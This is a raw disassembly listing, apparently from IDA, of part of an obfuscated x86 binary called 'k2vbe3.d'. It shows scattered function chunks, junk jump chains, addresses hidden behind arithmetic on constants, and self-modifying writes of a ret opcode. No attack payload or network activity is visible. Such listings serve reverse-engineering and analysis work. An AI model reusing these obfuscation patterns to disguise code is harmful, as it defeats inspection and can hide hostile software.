; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_45617A:				; CODE XREF: sub_4424CF:loc_44D51Bj
					; sub_44ED3C+328Cj
		call	sub_45AA57
		test	eax, eax
		setnz	[ebp+var_1]
; END OF FUNCTION CHUNK	FOR sub_4424CF
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_456185:				; CODE XREF: sub_453FF1-16106j
					; sub_453FF1:loc_44BC05j ...
		mov	al, [ebp-1]
		push	offset loc_4522A6
		jmp	nullsub_201
; END OF FUNCTION CHUNK	FOR sub_453FF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_456192:				; CODE XREF: sub_4437D3:loc_44182Cj
		add	edx, 0D61A21C5h
		xchg	edx, [esp+0Ch+var_C]
		push	0
		call	sub_43F26C
		push	edi
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		jmp	loc_44D971
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FED

loc_4561AD:				; CODE XREF: sub_44866A:loc_442D42j
					; sub_456FED:loc_44D291j
		mov	byte ptr [eax],	0C3h
		jmp	loc_450E1C
; ---------------------------------------------------------------------------

loc_4561B5:				; CODE XREF: sub_456FEDj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	offset sub_443F5B
		jmp	loc_4428C0
; END OF FUNCTION CHUNK	FOR sub_456FED

; =============== S U B	R O U T	I N E =======================================



sub_4561C3	proc near		; DATA XREF: sub_4522E6+12o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C168 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004413FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447A03 SIZE 00000013 BYTES

		add	eax, ebp

loc_4561C5:				; CODE XREF: k2vbe3.d:loc_45157Fj
		add	eax, 2BB963D1h
		push	eax

loc_4561CC:				; CODE XREF: k2vbe3.d:loc_455EE8j
		call	sub_4508A3
		push	ecx
		push	7C1BC98h
		jmp	loc_43C168
sub_4561C3	endp

; ---------------------------------------------------------------------------
		test	ebp, edx
		jmp	loc_443180
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_4561E3:				; CODE XREF: sub_457580+F8Aj
		jnz	loc_442DD4
		jmp	loc_45720C
; END OF FUNCTION CHUNK	FOR sub_457580

; =============== S U B	R O U T	I N E =======================================



sub_4561EE	proc near		; DATA XREF: sub_44B912:loc_449F71o

; FUNCTION CHUNK AT 0044FA1D SIZE 00000005 BYTES

		push	eax
		call	sub_44BAE4

loc_4561F4:				; CODE XREF: k2vbe3.d:loc_44FF8Dj
		xor	ecx, 2D1DB7D5h
		add	ecx, 0CD1FFEC5h
		xchg	ecx, [esp+0]
		jmp	loc_44FA1D
sub_4561EE	endp


; =============== S U B	R O U T	I N E =======================================



sub_456208	proc near		; CODE XREF: k2vbe3.d:00440038j
					; sub_441F02+6p

; FUNCTION CHUNK AT 00440810 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D3CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451384 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	ecx, ebp
		add	ecx, 38F59AEEh
		mov	al, [ecx]

loc_456216:				; CODE XREF: sub_44CE6C-940Bj
		jmp	loc_440810
sub_456208	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	ds:dword_41E168
; ---------------------------------------------------------------------------

loc_456221:				; CODE XREF: k2vbe3.d:0045A7B7j
		jmp	loc_44EA67
; ---------------------------------------------------------------------------

loc_456226:				; CODE XREF: k2vbe3.d:00452918j
		jmp	sub_45634D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_483. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	byte ptr [edi+44h], 0
		jmp	locret_44CA0F
; ---------------------------------------------------------------------------
		add	ebx, 8DE83CB8h
		popf
		jmp	sub_441632
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445593

loc_456241:				; CODE XREF: sub_445593:loc_4562A8j
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_445593
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_456249:				; CODE XREF: sub_440C94:loc_457ABEj
		push	eax
		push	edx
		push	0D14E996Dh
		pop	edx
		add	edx, 0C1EB7326h
		jmp	loc_45B92A
; END OF FUNCTION CHUNK	FOR sub_440C94

; =============== S U B	R O U T	I N E =======================================



sub_45625C	proc near		; DATA XREF: k2vbe3.d:004487C8o
		lea	eax, sub_43D0A9
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D0A9
sub_45625C	endp

; ---------------------------------------------------------------------------
		call	nullsub_508
		jmp	ds:dword_41E110
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_456275:				; CODE XREF: sub_43D7A9+164B2j
		jmp	loc_454B97
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_508. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jnz	loc_441154
		mov	eax, [esp]
		push	edx
		jmp	loc_447946
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_44EB57
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_456291:				; CODE XREF: sub_456541-A420j
		jmp	loc_459CEE
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
byte_456296	db 9, 0C0h		; DATA XREF: k2vbe3.d:0044159Fo
; ---------------------------------------------------------------------------
		jmp	loc_452B20
; ---------------------------------------------------------------------------

loc_45629D:				; CODE XREF: k2vbe3.d:00442195j
		mov	edx, ds:dword_447990
		call	sub_458A60
; START	OF FUNCTION CHUNK FOR sub_445593

loc_4562A8:				; CODE XREF: sub_445593+D13Aj
		jmp	loc_456241
; END OF FUNCTION CHUNK	FOR sub_445593
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AE2

loc_4562AD:				; CODE XREF: sub_448AE2-8628j
		jmp	loc_448D44
; END OF FUNCTION CHUNK	FOR sub_448AE2
; ---------------------------------------------------------------------------

loc_4562B2:				; CODE XREF: k2vbe3.d:00440D5Aj
		push	26CF15ACh
; START	OF FUNCTION CHUNK FOR sub_44E647

loc_4562B7:				; CODE XREF: sub_44E647:loc_440D45j
		add	ecx, 0EF12E802h
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_4454D4
; END OF FUNCTION CHUNK	FOR sub_44E647
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_4562C5:				; CODE XREF: sub_4506C3-C36Bj
		test	eax, 40000000h
		jmp	loc_4477DF
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------

loc_4562D0:				; CODE XREF: k2vbe3.d:loc_43F3D7j
					; k2vbe3.d:0045800Ej
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp]
		push	7BBB9801h
		xchg	edx, [esp]
		mov	esi, edx
		pop	edx
		jmp	loc_44C089
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C297

loc_4562E6:				; CODE XREF: sub_44C297+149Bj
		rol	edi, 19h
		add	edi, 0B17842B1h
		and	edi, 4BF5C929h
		add	edi, 67A636D9h
		call	sub_44DCC0
; END OF FUNCTION CHUNK	FOR sub_44C297
; START	OF FUNCTION CHUNK FOR sub_43C1C5

loc_456300:				; CODE XREF: sub_43C1C5+1635Aj
		jmp	loc_440938
; END OF FUNCTION CHUNK	FOR sub_43C1C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_456305:				; CODE XREF: sub_448113+91D4j
		jmp	loc_4583EE
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------

loc_45630A:				; CODE XREF: k2vbe3.d:004414B5j
		jmp	locret_44692D
; ---------------------------------------------------------------------------
		shr	ecx, 1Fh
		shl	ebx, 0Bh
		jmp	sub_45762D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_45631A:				; CODE XREF: sub_44ED3C:loc_44F4A9j
		jge	loc_458885

loc_456320:				; CODE XREF: sub_45A051+1Cj
		jmp	loc_43E2B4
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_456325:				; CODE XREF: sub_43CCD0:loc_456C05j
		mov	ecx, edi
		jmp	loc_45887D
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
		and	ecx, 45459249h
		pop	ebp
		jmp	loc_452DAE

; =============== S U B	R O U T	I N E =======================================



sub_456338	proc near		; CODE XREF: sub_41A390+2Ap
					; sub_41A390+5Dp ...
		call	sub_45634D
		jmp	ds:off_41E028
sub_456338	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6CA

loc_456343:				; CODE XREF: sub_44C6CA+1Dj
		jmp	loc_45693E
; END OF FUNCTION CHUNK	FOR sub_44C6CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_456348:				; CODE XREF: sub_43CCD0+974Cj
		jmp	nullsub_355
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_45634D	proc near		; CODE XREF: k2vbe3.d:loc_456226j
					; sub_456338p ...

; FUNCTION CHUNK AT 0044B6D4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044CFA1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045291D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454124 SIZE 00000005 BYTES

		jnb	loc_45291D
		pop	edx
		mov	eax, [esp+0]
		jmp	loc_44CFA1
sub_45634D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_45635C:				; CODE XREF: sub_4426DF:loc_4503EFj
		mov	edi, ebx
		pop	ebx
		xor	edi, 0BCDAF907h
		add	edi, 0F050DE4h
		sub	edi, 772AFD3Ch
		add	edi, 9CF2D675h
		xchg	edi, [esp+0]
		jmp	loc_45AF54
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C927

loc_45637F:				; CODE XREF: sub_43C927+1D916j
		or	eax, eax
		jnz	loc_442FAD
		jmp	loc_45359E
; END OF FUNCTION CHUNK	FOR sub_43C927
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_45638C:				; CODE XREF: sub_441D41+DC74j
		call	nullsub_16
		retn
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------

loc_456392:				; CODE XREF: k2vbe3.d:loc_44E6E1j
		push	edx
		mov	edx, ebp
		xchg	edx, [esp]
		push	offset sub_45574A
		jmp	locret_4448DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_4563A2:				; CODE XREF: sub_450CBF-3C49j
					; sub_450CBF:loc_455DFEj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43D696
		jmp	loc_45743B
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
		xchg	edx, eax
		mov	ebp, [ecx]
		jmp	sub_45AB6D
; ---------------------------------------------------------------------------

loc_4563BC:				; CODE XREF: k2vbe3.d:loc_44DA30j
		jz	loc_4495DF

loc_4563C2:				; CODE XREF: k2vbe3.d:004543EFj
		jmp	loc_44B714
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454234

loc_4563C7:				; CODE XREF: sub_454234+1j
		jmp	loc_447D9F
; END OF FUNCTION CHUNK	FOR sub_454234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_4563CC:				; CODE XREF: sub_446CCF+CD1Aj
		jmp	loc_4508DF
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575DF

loc_4563D1:				; CODE XREF: sub_4575DF-1AFEDj
		jmp	loc_44F232
; END OF FUNCTION CHUNK	FOR sub_4575DF
; ---------------------------------------------------------------------------
		add	ebp, edx
		test	eax, esi
		jmp	loc_4495D3
; ---------------------------------------------------------------------------

loc_4563DF:				; DATA XREF: sub_4536DC+764o
		mov	[edi], edx
		pop	edi

loc_4563E2:				; CODE XREF: k2vbe3.d:0044B144j
					; k2vbe3.d:00457A83j
		xchg	eax, edx
		call	sub_45B20A
		retn
; ---------------------------------------------------------------------------

loc_4563E9:				; CODE XREF: k2vbe3.d:004559D9j
		jmp	loc_450F34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_4563EE:				; CODE XREF: sub_44ED3C-666Aj
		jmp	loc_44BE99
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
		db 25h
dword_4563F4	dd 0			; DATA XREF: k2vbe3.d:loc_44B13Cr
					; k2vbe3.d:00457A7Br
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4563F8:				; CODE XREF: sub_457D4B-583Cj
		jmp	loc_448B0C
; END OF FUNCTION CHUNK	FOR sub_457D4B

; =============== S U B	R O U T	I N E =======================================



sub_4563FD	proc near		; CODE XREF: sub_458BA9:loc_45A4F2j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DABD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455837 SIZE 0000000F BYTES

		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		push	39B65F90h
		call	sub_45960E

loc_45640D:				; CODE XREF: sub_440CEA+13048j
		jmp	loc_455837
sub_4563FD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_456412:				; CODE XREF: sub_43DFE1:loc_4585B3j
		push	offset sub_43F364
		jmp	loc_4445D8
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_45641C:				; CODE XREF: sub_44D9A7:loc_443210j
		pop	edx
		add	edx, ds:4000E8h
		sub	edx, 29C85BF5h
		test	edx, 80000h
		jmp	loc_449584
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_456434:				; CODE XREF: sub_44D298:loc_459965j
		or	edx, 564E8886h
		sub	edx, 0DFE9C7B6h
		add	edx, 0F39BF342h
		xor	edx, 75276BD2h
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		jmp	loc_458416
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E9D

loc_456456:				; CODE XREF: sub_443E9D-5B42j
		call	sub_451F91

loc_45645B:				; CODE XREF: sub_442F31+549Fj
		and	edi, edx

loc_45645D:				; CODE XREF: sub_442F31:loc_45C0FBj
		call	sub_4436CE
		mov	edx, 0F75CA70h
		push	offset sub_45226C
		jmp	loc_447DB2
; END OF FUNCTION CHUNK	FOR sub_443E9D

; =============== S U B	R O U T	I N E =======================================



sub_456471	proc near		; CODE XREF: sub_450F71-11F35j
					; sub_44B94B:loc_4509E3j

; FUNCTION CHUNK AT 0043E867 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440485 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441926 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C153 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004518F6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452152 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00454000 SIZE 0000001B BYTES

		push	ebx
		adc	esi, ebp
		add	esi, 69DEA642h
		jbe	loc_440485
		jmp	loc_454000
sub_456471	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_316. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_456486:				; CODE XREF: sub_43C82E+15684j
		jmp	nullsub_209
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_45648B:				; CODE XREF: sub_440D7B:loc_45AFD4j
		shr	ecx, 9
		jmp	loc_4544E6
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
		sub	edx, 22A3FCAh
		jmp	loc_459210

; =============== S U B	R O U T	I N E =======================================



sub_45649E	proc near		; CODE XREF: sub_43C418+16p
					; k2vbe3.d:0043E92Dj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C885 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045343D SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	ecx
		shl	eax, 7
		jmp	loc_43C885
sub_45649E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_4564AB:				; CODE XREF: sub_44A1B1:loc_458DF8j
		mov	eax, [ebp+8]
		test	byte ptr [eax-10h], 38h
		jnz	loc_441C00
		mov	eax, [ebp+8]
		jmp	loc_44A60B
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_4564C0:				; CODE XREF: sub_44EC4A+733Aj
		pop	esi
		rol	esi, 1
		add	esi, 46A77C99h
		xchg	esi, [esp+8+var_8]
		jmp	loc_43CE4E
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_4564D1:				; CODE XREF: sub_449372-6286j
		jz	loc_45BAE9
		and	ebp, 0FBEAA4C5h

loc_4564DD:				; CODE XREF: k2vbe3.d:loc_43CB20j
		call	sub_44128B
		mov	edx, 1AE260E8h
		call	sub_45B20A
		push	eax
		ror	eax, 9
		jmp	loc_450736
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_4564F5:				; CODE XREF: k2vbe3.d:00440737j
		jl	loc_445E57
		and	ebx, 0A5D56EC8h
		jmp	sub_457B59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_456506:				; CODE XREF: sub_45C041-EE94j
		jge	loc_4507C5

loc_45650C:				; CODE XREF: sub_443BDF:loc_443D9Cj
		jz	loc_454228
		popf
		jmp	loc_4507BF
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_456518:				; CODE XREF: sub_441409:loc_43D2E2j
					; DATA XREF: sub_456767+7o
		mov	eax, [esp+0]
		push	edx
		call	sub_446E1E

loc_456521:				; CODE XREF: k2vbe3.d:00441FA5j
		mov	eax, 0EF9F7D01h
		push	edx
		mov	edx, ebx
		xchg	edx, [esp+8+var_8]
		push	8E44F4DCh

loc_456531:				; CODE XREF: sub_45282D:loc_441F50j
		jmp	loc_45A7BC
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_456536:				; CODE XREF: sub_447692:loc_452F47j
		jz	loc_43C021
		jmp	loc_44B4BF
; END OF FUNCTION CHUNK	FOR sub_447692

; =============== S U B	R O U T	I N E =======================================



sub_456541	proc near		; CODE XREF: sub_444A06+1j
					; sub_44071B:loc_456896p

; FUNCTION CHUNK AT 0043DDEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F13D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443902 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044443D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444A36 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445207 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004462A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447843 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B53D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA9D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C10E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044D086 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D93A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044F7D6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004505F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454634 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004546AD SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00454AF7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456291 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459CEE SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [eax-10h]
		shr	eax, 6
		jmp	loc_44BA9D
sub_456541	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_456550:				; CODE XREF: sub_43DFE1-316j
		or	eax, 3BBB54BBh
		jnz	loc_442D56

loc_45655C:				; CODE XREF: sub_45A323-2E54j
		jmp	nullsub_262
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_456561:				; CODE XREF: sub_44B912+24B8j
		jmp	loc_451A28
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		js	loc_456DD6
		jmp	loc_442D55
; ---------------------------------------------------------------------------

loc_456571:				; CODE XREF: k2vbe3.d:0044B815j
		jge	loc_43CE1B
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_456577:				; CODE XREF: sub_4529E2-15E3Bj
		jmp	loc_44F447
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
		cdq
		adc	edx, 81D66C79h
		jmp	loc_43CE1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_456588:				; CODE XREF: sub_446CE6-7131j
		push	edx
		pop	ecx

loc_45658A:				; CODE XREF: sub_446CE6:loc_44EB34j
		call	sub_44128B
		mov	edx, 0DE6CF580h
		call	sub_45B20A
		push	offset sub_449B8B
		jmp	loc_448D7A
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_4565A3:				; CODE XREF: sub_457DCA-139A6j
		jge	loc_440F3D
		jmp	loc_4495CE
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_4565AE:				; CODE XREF: sub_443FC1-D4Ej
					; sub_455C7A+3ABFj
		jnz	loc_4592DB
		jbe	loc_4435A8
		and	ebx, edx
		jmp	loc_4592D8
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp]
		push	eax
		pop	ebx
		xchg	ebx, [esp]
		ror	eax, 0Eh
		jmp	loc_451ADE
; ---------------------------------------------------------------------------
		mov	edx, 0C90D1845h
		call	sub_45B20A
		push	eax
		push	offset sub_4426F8
		jmp	loc_44463A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_4565E9:				; CODE XREF: sub_440C94+116D3j
		pop	edi
		mov	ebp, [eax]
		mov	eax, 0E2DF234Bh
		test	ebx, edi
		jmp	loc_44BB21
; END OF FUNCTION CHUNK	FOR sub_440C94

; =============== S U B	R O U T	I N E =======================================



sub_4565F8	proc near		; DATA XREF: k2vbe3.d:loc_45A8A5o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004411F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F646 SIZE 00000006 BYTES

		mov	edx, [esp+0]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		call	sub_43C206
		mov	eax, [esp+0]
		jmp	loc_4411F1
sub_4565F8	endp

; ---------------------------------------------------------------------------

loc_456610:				; DATA XREF: sub_45524B:loc_44F975o
		pop	ecx
		xor	eax, eax
		push	esi
		push	36A1C22Fh
		pop	esi
		rol	esi, 15h
		add	esi, 0E9956D41h
		jmp	loc_45ADF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_456628:				; CODE XREF: sub_44471B+5F58j
		call	sub_45724E

loc_45662D:				; CODE XREF: k2vbe3.d:00458C1Fj
		jmp	loc_44C875
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4402FA

loc_456632:				; CODE XREF: sub_4402FA+Dj
		jns	$+6
		push	ebp

loc_456639:				; CODE XREF: sub_44469A:loc_43E51Ej
		mov	eax, [ebp-4]

loc_45663C:				; CODE XREF: k2vbe3.d:0045560Bj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44A8A4
		jmp	loc_4513C4
; END OF FUNCTION CHUNK	FOR sub_4402FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448052

loc_45664A:				; CODE XREF: sub_448052-6B27j
		xchg	ebx, [esp+4+var_4]
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_448052
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_456652:				; CODE XREF: sub_44F20A+7664j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_456655:				; CODE XREF: sub_44C1BD+2A2Dj
		jmp	loc_441189
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_45665A:				; CODE XREF: sub_44F20A+765Dj
		mov	eax, [ebp-4]
		mov	al, [eax]
		sub	al, 99h
		jmp	loc_4530C7
; END OF FUNCTION CHUNK	FOR sub_44F20A

; =============== S U B	R O U T	I N E =======================================



sub_456666	proc near		; CODE XREF: sub_44921C+7p
					; k2vbe3.d:00454B92j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CD8F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D3CF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043D8BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DEF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DF77 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043EAD5 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0043FC26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004434AC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00444CFB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00444EBF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446B23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044747C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448277 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A2C4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A6ED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A8BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BBF5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BE2B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D33D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044D60D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E02C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044F2C8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F935 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FE01 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044FFF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450415 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451DC2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453F8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456685 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00456B67 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457118 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00457852 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458B37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459E96 SIZE 00000005 BYTES

		xchg	ecx, [esp+4+var_4]
		pop	ecx
		mov	[edx], al
		inc	dword ptr [ebp-28h]

loc_45666F:				; CODE XREF: sub_45A323-5B38j
		jmp	loc_44FFF0
sub_456666	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_456674:				; CODE XREF: sub_447E07:loc_4466FAj
		sbb	esi, 27CCE9CAh
		rol	ecx, 4
		pop	edi
